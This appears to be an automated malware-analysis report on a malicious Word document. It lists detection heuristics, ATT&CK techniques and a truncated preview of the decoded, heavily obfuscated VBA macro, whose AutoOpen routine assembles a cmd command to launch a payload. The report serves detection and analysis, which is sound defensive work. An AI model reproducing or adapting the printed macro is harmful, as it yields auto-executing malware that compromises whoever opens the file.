MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
This document contains a malicious VBA macro, indicated by the AutoOpen marker and a critical Shell() call. The macro is designed to execute a secondary payload, as evidenced by the obfuscated code within the 'macros.bas' script. The primary IOC is the macro file itself, which is responsible for the malicious execution.
Heuristics 6
-
ClamAV: Doc.Malware.00536d-6699021-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6699021-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 103346 bytes |
SHA-256: db7fdf97b684dd39b5edd20671ce0d54241e152a74503c7db7c2ef7a7b7d1470 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "YqSEdMqonDEFL" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim zFtMKt(1) zFtMKt(0) = Left(PNcwX + upqPBMiWSikaUjvzTOfa + ifPuB, 69) + InStr(RFMmrR + jitbJWDmvDZDcONTjPcJ + NJOzppdi, zjwtMqL + AVUoqVdwmDGZiNaEwGZvC + hRUGqE) Dim UdqsJ(1) UdqsJ(0) = Left(wVtPmmC + zPkBqwutEjBTFThplOohF + zAcFi, 620) + InStr(FZOii + wtFZbdQiwzATifSjztRu + NOzuSLGj, vbjHdj + IjfTbusizWpiwNOQfQl + RMQFzK) + InStrRev(TYmtUt + CjwGKmwvHtPdWoLCOim + tGVGM, TbKdj + JDZTJsQwYuPFJqYAwNDrf + CanIR) + InStr(DBzoKdr + KzLzhdCjOjpXGjApqDoHz + IrkQm, KtuUm + wkYCQjunuacBupOSjml + cXiMMR) Dim XhtSPF(1) XhtSPF(0) = Right(UNEpqJH + XFFUwLRGatPVUdETBj + jhLYjdc, 357) + Right(BoMUcb + AIinUAiUMEnPiRnkwfoi + CSuIABd, 140) Dim Kqqubm(1) Kqqubm(0) = InStr(WKHCnItu + svKvhvSjOojCOrjDjWoY + XjATsrTr, iYOJwwJG + qItVIJrpkEWJKvwo + owbzGc) + InStr(lMiRL + niLbhcTiLiMDLRkkBKR + ojmDY, iwuWQ + prmisoPaPhBRjEWIJm + wvNFwOER) + Right(EvtOfY + ZJXWWEGwpAHiBoifijBV + dNlhnZza, 681) + Left(SbYJjpRO + ucDrZwttYoZbtqoQDjuO + MKVBqjG, 625) Dim PbdbNE(1) PbdbNE(0) = Left(uIIHls + czMubDVOLTwAYvLmK + tIkVIW, 257) + Right(mtiJmKH + THNClufHkLZGKFDKGu + JdjFn, 99) + InStr(oKZrDF + PadOcthKYzjtRhzDYFP + tWXPjr, OjufR + PWzuPFirQHKERAUDVF + ATUvSZCO) + Right(TnCFU + LPjwYjCvOuLNBawbuJPio + AkOPM, 614) hwXhczA (KeyString(StVXBT + rzYXCKz + 19 + 1 + 47 + GLwaaR + QEJswz) + QVCrCD + vDFYufHX + KeyString(zJFosb + kPBmuznC + 21 + 1 + 55 + uHNDiCfW + flwmlW) + dNiWMl + QXZFktJwkbI + mfzmNJQ + uGIVqTfUqbR + kwPtcnaPBEv + jjXmR + nHtXRhMOz + hqNcDbp + sAfSs) Dim CQmiqF(2) CQmiqF(0) = InStr(BzGoH + cNOZQocvZqfZzDjiKEjCw + IpIlwXU, zcjdla + FzaTBQiXZjusKijmmzc + IjEHr) + Left(kjhzwhOG + DZwoWWoJuEniCdKSuJqk + KKNVlUav, 884) + InStrRev(TXlMP + tswAfTPDowjNpMMbodZir + aMrZF, MrizK + FSRmzKiNiZAnJATOZsCai + XAzotB) + InStr(iKHssiY + MzErCMUtwGBCDhniPIlX + aqLWN, fmNfi + naUzDafRUoKqqbbkkc + wjQFV) CQmiqF(1) = Left(IZHSupn + tavYrhrKhimpsROWSmV + mMPCXv, 158) + InStrRev(GrKjzUQd + nlsEfRacRThXPflATOZKz + fLUtF, aWitHj + ThCUZTuBpwdGjvHimOIh + UzsAsXi) Dim wFZpf(1) wFZpf(0) = Left(AjKpLl + wtbLjUsRdQMbdQiCcUUl + ltNJlGnr, 322) + InStrRev(PMNriM + OXnVmYdjQEcIuaAjfW + LEjOEV, IMZqTzYb + dEbMztrSQiplCcQFS + YWwPi) Dim zCYGS(1) zCYGS(0) = InStrRev(szHYUM + LfkkEQVHJsVfFPNqUOJW + MJdIhwIE, Qfzbk + DwaYtnjaHWifCIbpswnLk + uzBcm) + InStr(SGaiXSWu + qlWzIIDicjwPHsskYWUP + vitRZ, QEUwuBmq + EdKWqpPaiKJNVVMaJrIsl + PsMqG) Dim wNwzO(1) wNwzO(0) = Left(MmXzC + tLKGGiuAFEZDqMfaaHSR + jhBqfd, 753) + Left(zpUMlh + NsupzAHUobOtakaAtw + RYkqWKq, 456) End Sub Attribute VB_Name = "vsIdXhkKIE" Function dNiWMl() ElAdAtmtDsN = "d // \ / " + "\ \\ /V:ON/" + "C" + """" + "set `\$~=02a7 702" + "a a270 a720 a" + "072 7a20 0a72 27a0 0" KSUtIiOL = "2a7 0a72 7a02 0" + "27a 0a72 a702 70" + "2a 2a70 027a 720a}a" Dim faUiT(1) faUiT(0) = Right(cBbTj + pHYbUnjodVWanHZILZVzN + qHDLKRIB, 495) + Right(MXGvp + XScMUbziwYTJYwcliS + ZOSZvw, 915) + Left(HfqsTdm + NmLdGfpvJTDfzSDDCXzij + iUYFT, 797) + Right(FSCvInjz + vjcfXoQjYVNDfpVWtqi + uABHqPTX, 996) Dim vJLjK(1) vJLjK(0) = InStrRev(sqKUu + ZPsXwGUKzPqKPdaPpVh + zrQkYwip, YDmwB + bzLQTzPkHtfavsXFpEvLVa + qZUHYzVu) + InStrRev(jfraV + kJpQjBqYaQfnqptBQzUjEBKA + OPiHTkRl, YdidY + uLqmpaYrQdlPVjhLhYUG + UpRnQ) + InStr(wmQpX + oDjbTnSpXACYqZFSi + NkbYVmc, EbJWd + mkHCztmOuawrjFZCwAvSNpkM + lrvCjSh) + InStr(lTwMca + NbzCGSnsqStMOhqDitKQ + jRWAo, BJXkwYiY + ocPdHlHXRXhLczXB + EXbsCrzu) Dim Hjzwko(2) Hjzwko(0) = InStr(lUrOX + mOcFvRnlWmInUOHthKBYm + YIUCm, ccEvu + WwOawjkjXdGDlqqAv + TijIHKr) + InStr(TGaLO + nYzncwZfcZrOEbtcfq + qtjVJA, owsCcv + WJEIiAlwaAwSIwwIu + PfwOktW) + InStrRev(KXsFWl + FtuXiAFvrkEdnvtZMQ + OwKqa, kWSEDBB + irThCmzXOoJdMUljaYK + WGOlZj) + InStr(rMuUw + czYSMWHJwawPIUMwLvY + nGkSQ, hmjDaArR + zEnzlrhNZHwGJLfGBDqqw + iRDIc) Hjzwko(1) = Right(LwTYNB + FNsrjXzn ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.